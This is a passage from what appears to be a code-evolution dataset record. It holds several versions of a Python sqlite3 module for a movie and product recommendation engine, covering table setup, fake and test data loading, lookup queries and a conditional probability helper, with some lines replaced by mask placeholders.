(NULL,?,?,?,?,?,?,?,?,?,?)'\n , values)\n 
conn.commit()\n\n\n<mask token>\n\n\ndef get_users(conn):\n c = conn.cursor()\n c.execute('select * from users')\n return c.fetchall()\n\n\ndef get_catalogs(conn):\n c = conn.cursor()\n c.execute('select * from catalogs')\n return c.fetchall()\n\n\ndef get_products(conn, catalog_id):\n c = conn.cursor()\n c.execute('select * from products where catalog_id = ?', (catalog_id,))\n return c.fetchall()\n\n\ndef get_product_by_id(conn, catalog_id, product_id):\n c = conn.cursor()\n c.execute('SELECT * FROM products WHERE catalog_id = ? AND id = ?', (\n catalog_id, product_id))\n return c.fetchall()\n\n\ndef get_products_bought(conn, catalog_id):\n c = conn.cursor()\n c.execute(\n 'select pb.* from products_bought pb, catalogs cat, products p where pb.product_id = p.id and p.catalog_id = ?'\n , (catalog_id,))\n return c.fetchall()\n\n\ndef get_all_data(conn):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id'\n )\n return c.fetchall()\n\n\ndef get_data_for_user(conn, userid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ?'\n , (userid,))\n return c.fetchall()\n\n\ndef get_data_for_user_and_catalog(conn, userid, catalogid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ? 
and c.id = ?'\n , (userid, catalogid))\n return c.fetchall()\n\n\n<mask token>\n\n\ndef get_recommendations_by_user(conn, userId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.user_id = ?'\n , (userId,))\n return c.fetchall()\n\n\ndef get_recommendations_by_product(conn, productId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.product_id = ?'\n , (productId,))\n return c.fetchall()\n\n\ndef get_connection():\n return sqlite3.connect('recommendation_engine.db')\n\n\ndef generate_context(product_id):\n return [product_id, device[randint(0, len(device) - 1)], oses[randint(0,\n len(oses) - 1)], times[randint(0, len(times) - 1)], days[randint(0,\n len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[randint(0, \n len(lons) - 1)], randint(0, 3), randint(0, 3)]\n\n\ndef add_recommendation(conn, product_ids, user_ids, contexts):\n ids = []\n c = conn.cursor()\n for i in range(0, len(product_ids)):\n product_id = product_ids[i]\n user_id = user_ids[i]\n context = contexts[i]\n c.execute(\n \"INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'false')\"\n , (user_id, product_id))\n context.insert(0, c.lastrowid)\n ids.append(c.lastrowid)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , context)\n conn.commit()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.id in (%s)'\n % ','.join('?' 
* len(ids)), ids)\n return c.fetchall()\n\n\ndef get_probability(conn, x, giveny):\n c = conn.cursor()\n query = 'select count(*) from product_context where '\n first = True\n params = []\n for key, val in x.items():\n if not first:\n query += ' and '\n else:\n first = False\n query += str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n total = c.fetchone()[0]\n for key, val in giveny.items():\n query += ' and ' + str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n smaller = c.fetchone()[0]\n if total == 0:\n return 0\n else:\n return smaller / float(total)\n\n\ndef load_test_data(conn):\n c = conn.cursor()\n c.execute('DELETE FROM catalogs')\n c.execute('DELETE FROM products')\n c.execute('DELETE FROM users')\n c.execute('DELETE FROM products_bought')\n c.execute('DELETE FROM product_context')\n c.execute('DELETE FROM recommendations')\n user_names = test_data.USER_NAMES\n product_names = test_data.PRODUCT_NAMES\n prices = test_data.POSSIBLE_PRICES\n catalog_ids = []\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', (\n 'MovieDatabase',))\n catalog_ids.append(c.lastrowid)\n user_ids = []\n for user in user_names:\n c.execute('INSERT INTO users (user_name) VALUES (?)', (user,))\n user_ids.append(c.lastrowid)\n product_ids = []\n for product in product_names:\n values = randint(1, 2000), catalog_ids[0], product, prices[randint(\n 0, len(prices) - 1)], 'desc'\n c.execute(\n 'INSERT INTO products (id, sku_id, catalog_id, product_name, price, description) VALUES (NULL,?,?,?,?,?)'\n , values)\n product_ids.append(c.lastrowid)\n for i in range(1, 50):\n values = user_ids[randint(0, len(user_ids) - 1)], product_ids[randint\n (0, len(product_ids) - 1)]\n c.execute(\n 'INSERT INTO products_bought (id,user_id,product_id) VALUES (NULL,?,?)'\n , values)\n values = c.lastrowid, device[randint(0, len(device) - 1)], oses[randint\n (0, len(oses) - 1)], times[randint(0, len(times) - 1)], days[\n randint(0, len(days) - 1)], 
lats[randint(0, len(lats) - 1)], lons[\n randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)'\n , values)\n for i in range(1, 1000):\n product_id = product_ids[randint(0, len(product_ids) - 1)]\n values = user_ids[randint(0, len(user_ids) - 1)], product_id\n c.execute(\n \"INSERT INTO recommendations (id,user_id,product_id,interacted) VALUES (NULL,?,?,'True')\"\n , values)\n values = c.lastrowid, product_id, device[randint(0, len(device) - 1)\n ], oses[randint(0, len(oses) - 1)], times[randint(0, len(times) -\n 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) -\n 1)], lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id,product_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , values)\n conn.commit()\n",
"step-3": "__author__ = 'tomer'\n<mask token>\n\n\ndef init_database(conn):\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS catalogs\n (id INTEGER PRIMARY KEY AUTOINCREMENT, catalog_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products\n (id INTEGER PRIMARY KEY AUTOINCREMENT, sku_id INTEGER, catalog_id INTEGER, product_name TEXT, price FLOAT, description TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS users\n (id INTEGER PRIMARY KEY AUTOINCREMENT, user_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products_bought\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER,product_id INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS product_context\n (id INTEGER PRIMARY KEY AUTOINCREMENT,recommendation_id INTEGER, product_id INTEGER, device TEXT, os TEXT, time_of_day TEXT, day_of_week TEXT, latitude float, longitude float,num_items_in_cart INTEGER, purchases_in_last_month INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS recommendations\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER, product_id INTEGER, interacted BOOLEAN)\"\"\"\n )\n\n\ndef load_fake_data(conn):\n c = conn.cursor()\n c.execute('DELETE FROM catalogs')\n c.execute('DELETE FROM products')\n c.execute('DELETE FROM users')\n c.execute('DELETE FROM products_bought')\n c.execute('DELETE FROM product_context')\n c.execute('DELETE FROM recommendations')\n catalogs = []\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', ('BestBuy',))\n catalogs.append(c.lastrowid)\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', ('RiteAid',))\n catalogs.append(c.lastrowid)\n ppl = []\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Tomer',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Alex',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Matt',))\n ppl.append(c.lastrowid)\n c.execute('INSERT 
INTO users (user_name) VALUES (?)', ('Rachael',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Sam',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Joey',))\n ppl.append(c.lastrowid)\n products = []\n for i in range(1, 20):\n c.execute(\n 'INSERT INTO products (id,sku_id,catalog_id, product_name, price,description) VALUES (NULL,?,?,?,?,?)'\n , (randint(1, 2000), catalogs[randint(0, len(catalogs) - 1)], \n 'Movie' + str(i), randint(1, 2000), 'Title' + str(i)))\n products.append(c.lastrowid)\n for i in range(1, 50):\n c.execute(\n 'INSERT INTO products_bought (id,user_id, product_id) VALUES (NULL,?,?)'\n , (ppl[randint(0, len(ppl) - 1)], products[randint(0, len(\n products) - 1)]))\n values = c.lastrowid, device[randint(0, len(device) - 1)], oses[randint\n (0, len(oses) - 1)], times[randint(0, len(times) - 1)], days[\n randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[\n randint(0, len(lons) - 1)], randint(0, 5), randint(0, 30)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)'\n , values)\n for i in range(1, 1000):\n product_id = products[randint(0, len(products) - 1)]\n c.execute(\n \"INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'true')\"\n , (ppl[randint(0, len(ppl) - 1)], product_id))\n values = c.lastrowid, product_id, device[randint(0, len(device) - 1)\n ], oses[randint(0, len(oses) - 1)], times[randint(0, len(times) -\n 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) -\n 1)], lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n 
, values)\n conn.commit()\n\n\noses = ['IOS', 'Android']\ndevice = ['mobile']\n<mask token>\ntimes = ['morning', 'afternoon', 'night']\ndays = ['M']\n<mask token>\nlats = ['north']\n<mask token>\nlons = ['east']\n\n\ndef get_users(conn):\n c = conn.cursor()\n c.execute('select * from users')\n return c.fetchall()\n\n\ndef get_catalogs(conn):\n c = conn.cursor()\n c.execute('select * from catalogs')\n return c.fetchall()\n\n\ndef get_products(conn, catalog_id):\n c = conn.cursor()\n c.execute('select * from products where catalog_id = ?', (catalog_id,))\n return c.fetchall()\n\n\ndef get_product_by_id(conn, catalog_id, product_id):\n c = conn.cursor()\n c.execute('SELECT * FROM products WHERE catalog_id = ? AND id = ?', (\n catalog_id, product_id))\n return c.fetchall()\n\n\ndef get_products_bought(conn, catalog_id):\n c = conn.cursor()\n c.execute(\n 'select pb.* from products_bought pb, catalogs cat, products p where pb.product_id = p.id and p.catalog_id = ?'\n , (catalog_id,))\n return c.fetchall()\n\n\ndef get_all_data(conn):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id'\n )\n return c.fetchall()\n\n\ndef get_data_for_user(conn, userid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ?'\n , (userid,))\n return c.fetchall()\n\n\ndef get_data_for_user_and_catalog(conn, userid, catalogid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ? 
and c.id = ?'\n , (userid, catalogid))\n return c.fetchall()\n\n\ndef get_transactions_for_catalog(conn, catalogid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and c.id = ?'\n , (catalogid,))\n return c.fetchall()\n\n\ndef get_recommendations_by_user(conn, userId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.user_id = ?'\n , (userId,))\n return c.fetchall()\n\n\ndef get_recommendations_by_product(conn, productId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.product_id = ?'\n , (productId,))\n return c.fetchall()\n\n\ndef get_connection():\n return sqlite3.connect('recommendation_engine.db')\n\n\ndef generate_context(product_id):\n return [product_id, device[randint(0, len(device) - 1)], oses[randint(0,\n len(oses) - 1)], times[randint(0, len(times) - 1)], days[randint(0,\n len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[randint(0, \n len(lons) - 1)], randint(0, 3), randint(0, 3)]\n\n\ndef add_recommendation(conn, product_ids, user_ids, contexts):\n ids = []\n c = conn.cursor()\n for i in range(0, len(product_ids)):\n product_id = product_ids[i]\n user_id = user_ids[i]\n context = contexts[i]\n c.execute(\n \"INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'false')\"\n , (user_id, product_id))\n context.insert(0, c.lastrowid)\n ids.append(c.lastrowid)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , context)\n conn.commit()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and 
r.id in (%s)'\n % ','.join('?' * len(ids)), ids)\n return c.fetchall()\n\n\ndef get_probability(conn, x, giveny):\n c = conn.cursor()\n query = 'select count(*) from product_context where '\n first = True\n params = []\n for key, val in x.items():\n if not first:\n query += ' and '\n else:\n first = False\n query += str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n total = c.fetchone()[0]\n for key, val in giveny.items():\n query += ' and ' + str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n smaller = c.fetchone()[0]\n if total == 0:\n return 0\n else:\n return smaller / float(total)\n\n\ndef load_test_data(conn):\n c = conn.cursor()\n c.execute('DELETE FROM catalogs')\n c.execute('DELETE FROM products')\n c.execute('DELETE FROM users')\n c.execute('DELETE FROM products_bought')\n c.execute('DELETE FROM product_context')\n c.execute('DELETE FROM recommendations')\n user_names = test_data.USER_NAMES\n product_names = test_data.PRODUCT_NAMES\n prices = test_data.POSSIBLE_PRICES\n catalog_ids = []\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', (\n 'MovieDatabase',))\n catalog_ids.append(c.lastrowid)\n user_ids = []\n for user in user_names:\n c.execute('INSERT INTO users (user_name) VALUES (?)', (user,))\n user_ids.append(c.lastrowid)\n product_ids = []\n for product in product_names:\n values = randint(1, 2000), catalog_ids[0], product, prices[randint(\n 0, len(prices) - 1)], 'desc'\n c.execute(\n 'INSERT INTO products (id, sku_id, catalog_id, product_name, price, description) VALUES (NULL,?,?,?,?,?)'\n , values)\n product_ids.append(c.lastrowid)\n for i in range(1, 50):\n values = user_ids[randint(0, len(user_ids) - 1)], product_ids[randint\n (0, len(product_ids) - 1)]\n c.execute(\n 'INSERT INTO products_bought (id,user_id,product_id) VALUES (NULL,?,?)'\n , values)\n values = c.lastrowid, device[randint(0, len(device) - 1)], oses[randint\n (0, len(oses) - 1)], times[randint(0, len(times) - 1)], days[\n 
randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[\n randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)'\n , values)\n for i in range(1, 1000):\n product_id = product_ids[randint(0, len(product_ids) - 1)]\n values = user_ids[randint(0, len(user_ids) - 1)], product_id\n c.execute(\n \"INSERT INTO recommendations (id,user_id,product_id,interacted) VALUES (NULL,?,?,'True')\"\n , values)\n values = c.lastrowid, product_id, device[randint(0, len(device) - 1)\n ], oses[randint(0, len(oses) - 1)], times[randint(0, len(times) -\n 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) -\n 1)], lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id,product_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , values)\n conn.commit()\n",
"step-4": "__author__ = 'tomer'\nimport sqlite3\nfrom random import randint\nimport test_data\n\n\ndef init_database(conn):\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS catalogs\n (id INTEGER PRIMARY KEY AUTOINCREMENT, catalog_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products\n (id INTEGER PRIMARY KEY AUTOINCREMENT, sku_id INTEGER, catalog_id INTEGER, product_name TEXT, price FLOAT, description TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS users\n (id INTEGER PRIMARY KEY AUTOINCREMENT, user_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products_bought\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER,product_id INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS product_context\n (id INTEGER PRIMARY KEY AUTOINCREMENT,recommendation_id INTEGER, product_id INTEGER, device TEXT, os TEXT, time_of_day TEXT, day_of_week TEXT, latitude float, longitude float,num_items_in_cart INTEGER, purchases_in_last_month INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS recommendations\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER, product_id INTEGER, interacted BOOLEAN)\"\"\"\n )\n\n\ndef load_fake_data(conn):\n c = conn.cursor()\n c.execute('DELETE FROM catalogs')\n c.execute('DELETE FROM products')\n c.execute('DELETE FROM users')\n c.execute('DELETE FROM products_bought')\n c.execute('DELETE FROM product_context')\n c.execute('DELETE FROM recommendations')\n catalogs = []\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', ('BestBuy',))\n catalogs.append(c.lastrowid)\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', ('RiteAid',))\n catalogs.append(c.lastrowid)\n ppl = []\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Tomer',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Alex',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Matt',))\n 
ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Rachael',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Sam',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Joey',))\n ppl.append(c.lastrowid)\n products = []\n for i in range(1, 20):\n c.execute(\n 'INSERT INTO products (id,sku_id,catalog_id, product_name, price,description) VALUES (NULL,?,?,?,?,?)'\n , (randint(1, 2000), catalogs[randint(0, len(catalogs) - 1)], \n 'Movie' + str(i), randint(1, 2000), 'Title' + str(i)))\n products.append(c.lastrowid)\n for i in range(1, 50):\n c.execute(\n 'INSERT INTO products_bought (id,user_id, product_id) VALUES (NULL,?,?)'\n , (ppl[randint(0, len(ppl) - 1)], products[randint(0, len(\n products) - 1)]))\n values = c.lastrowid, device[randint(0, len(device) - 1)], oses[randint\n (0, len(oses) - 1)], times[randint(0, len(times) - 1)], days[\n randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[\n randint(0, len(lons) - 1)], randint(0, 5), randint(0, 30)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)'\n , values)\n for i in range(1, 1000):\n product_id = products[randint(0, len(products) - 1)]\n c.execute(\n \"INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'true')\"\n , (ppl[randint(0, len(ppl) - 1)], product_id))\n values = c.lastrowid, product_id, device[randint(0, len(device) - 1)\n ], oses[randint(0, len(oses) - 1)], times[randint(0, len(times) -\n 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) -\n 1)], lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , 
purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , values)\n conn.commit()\n\n\noses = ['IOS', 'Android']\ndevice = ['mobile']\n<mask token>\ntimes = ['morning', 'afternoon', 'night']\ndays = ['M']\n<mask token>\nlats = ['north']\n<mask token>\nlons = ['east']\n\n\ndef get_users(conn):\n c = conn.cursor()\n c.execute('select * from users')\n return c.fetchall()\n\n\ndef get_catalogs(conn):\n c = conn.cursor()\n c.execute('select * from catalogs')\n return c.fetchall()\n\n\ndef get_products(conn, catalog_id):\n c = conn.cursor()\n c.execute('select * from products where catalog_id = ?', (catalog_id,))\n return c.fetchall()\n\n\ndef get_product_by_id(conn, catalog_id, product_id):\n c = conn.cursor()\n c.execute('SELECT * FROM products WHERE catalog_id = ? AND id = ?', (\n catalog_id, product_id))\n return c.fetchall()\n\n\ndef get_products_bought(conn, catalog_id):\n c = conn.cursor()\n c.execute(\n 'select pb.* from products_bought pb, catalogs cat, products p where pb.product_id = p.id and p.catalog_id = ?'\n , (catalog_id,))\n return c.fetchall()\n\n\ndef get_all_data(conn):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id'\n )\n return c.fetchall()\n\n\ndef get_data_for_user(conn, userid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ?'\n , (userid,))\n return c.fetchall()\n\n\ndef get_data_for_user_and_catalog(conn, userid, catalogid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ? 
and c.id = ?'\n , (userid, catalogid))\n return c.fetchall()\n\n\ndef get_transactions_for_catalog(conn, catalogid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and c.id = ?'\n , (catalogid,))\n return c.fetchall()\n\n\ndef get_recommendations_by_user(conn, userId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.user_id = ?'\n , (userId,))\n return c.fetchall()\n\n\ndef get_recommendations_by_product(conn, productId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.product_id = ?'\n , (productId,))\n return c.fetchall()\n\n\ndef get_connection():\n return sqlite3.connect('recommendation_engine.db')\n\n\ndef generate_context(product_id):\n return [product_id, device[randint(0, len(device) - 1)], oses[randint(0,\n len(oses) - 1)], times[randint(0, len(times) - 1)], days[randint(0,\n len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[randint(0, \n len(lons) - 1)], randint(0, 3), randint(0, 3)]\n\n\ndef add_recommendation(conn, product_ids, user_ids, contexts):\n ids = []\n c = conn.cursor()\n for i in range(0, len(product_ids)):\n product_id = product_ids[i]\n user_id = user_ids[i]\n context = contexts[i]\n c.execute(\n \"INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'false')\"\n , (user_id, product_id))\n context.insert(0, c.lastrowid)\n ids.append(c.lastrowid)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , context)\n conn.commit()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and 
r.id in (%s)'\n % ','.join('?' * len(ids)), ids)\n return c.fetchall()\n\n\ndef get_probability(conn, x, giveny):\n c = conn.cursor()\n query = 'select count(*) from product_context where '\n first = True\n params = []\n for key, val in x.items():\n if not first:\n query += ' and '\n else:\n first = False\n query += str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n total = c.fetchone()[0]\n for key, val in giveny.items():\n query += ' and ' + str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n smaller = c.fetchone()[0]\n if total == 0:\n return 0\n else:\n return smaller / float(total)\n\n\ndef load_test_data(conn):\n c = conn.cursor()\n c.execute('DELETE FROM catalogs')\n c.execute('DELETE FROM products')\n c.execute('DELETE FROM users')\n c.execute('DELETE FROM products_bought')\n c.execute('DELETE FROM product_context')\n c.execute('DELETE FROM recommendations')\n user_names = test_data.USER_NAMES\n product_names = test_data.PRODUCT_NAMES\n prices = test_data.POSSIBLE_PRICES\n catalog_ids = []\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', (\n 'MovieDatabase',))\n catalog_ids.append(c.lastrowid)\n user_ids = []\n for user in user_names:\n c.execute('INSERT INTO users (user_name) VALUES (?)', (user,))\n user_ids.append(c.lastrowid)\n product_ids = []\n for product in product_names:\n values = randint(1, 2000), catalog_ids[0], product, prices[randint(\n 0, len(prices) - 1)], 'desc'\n c.execute(\n 'INSERT INTO products (id, sku_id, catalog_id, product_name, price, description) VALUES (NULL,?,?,?,?,?)'\n , values)\n product_ids.append(c.lastrowid)\n for i in range(1, 50):\n values = user_ids[randint(0, len(user_ids) - 1)], product_ids[randint\n (0, len(product_ids) - 1)]\n c.execute(\n 'INSERT INTO products_bought (id,user_id,product_id) VALUES (NULL,?,?)'\n , values)\n values = c.lastrowid, device[randint(0, len(device) - 1)], oses[randint\n (0, len(oses) - 1)], times[randint(0, len(times) - 1)], days[\n 
randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[\n randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)'\n , values)\n for i in range(1, 1000):\n product_id = product_ids[randint(0, len(product_ids) - 1)]\n values = user_ids[randint(0, len(user_ids) - 1)], product_id\n c.execute(\n \"INSERT INTO recommendations (id,user_id,product_id,interacted) VALUES (NULL,?,?,'True')\"\n , values)\n values = c.lastrowid, product_id, device[randint(0, len(device) - 1)\n ], oses[randint(0, len(oses) - 1)], times[randint(0, len(times) -\n 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) -\n 1)], lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)\n c.execute(\n 'INSERT INTO product_context (id,recommendation_id,product_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)'\n , values)\n conn.commit()\n",
"step-5": "__author__ = 'tomer'\nimport sqlite3\nfrom random import randint\nimport test_data\n\ndef init_database(conn):\n c = conn.cursor()\n c.execute('''CREATE TABLE IF NOT EXISTS catalogs\n (id INTEGER PRIMARY KEY AUTOINCREMENT, catalog_name TEXT)''')\n c.execute('''CREATE TABLE IF NOT EXISTS products\n (id INTEGER PRIMARY KEY AUTOINCREMENT, sku_id INTEGER, catalog_id INTEGER, product_name TEXT, price FLOAT, description TEXT)''')\n c.execute('''CREATE TABLE IF NOT EXISTS users\n (id INTEGER PRIMARY KEY AUTOINCREMENT, user_name TEXT)''')\n c.execute('''CREATE TABLE IF NOT EXISTS products_bought\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER,product_id INTEGER)''')\n c.execute('''CREATE TABLE IF NOT EXISTS product_context\n (id INTEGER PRIMARY KEY AUTOINCREMENT,recommendation_id INTEGER, product_id INTEGER, device TEXT, os TEXT, time_of_day TEXT, day_of_week TEXT, latitude float, longitude float,num_items_in_cart INTEGER, purchases_in_last_month INTEGER)''')\n c.execute('''CREATE TABLE IF NOT EXISTS recommendations\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER, product_id INTEGER, interacted BOOLEAN)''')\n\n\ndef load_fake_data(conn):\n\n c = conn.cursor()\n c.execute('''DELETE FROM catalogs''')\n c.execute('''DELETE FROM products''')\n c.execute('''DELETE FROM users''')\n c.execute('''DELETE FROM products_bought''')\n c.execute('''DELETE FROM product_context''')\n c.execute('''DELETE FROM recommendations''')\n\n catalogs = []\n c.execute('''INSERT INTO catalogs (catalog_name) VALUES (?)''',('BestBuy',))\n catalogs.append(c.lastrowid)\n c.execute('''INSERT INTO catalogs 